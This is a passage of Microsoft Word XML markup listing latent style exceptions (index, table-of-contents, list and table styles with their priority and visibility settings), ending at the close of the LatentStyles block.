<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
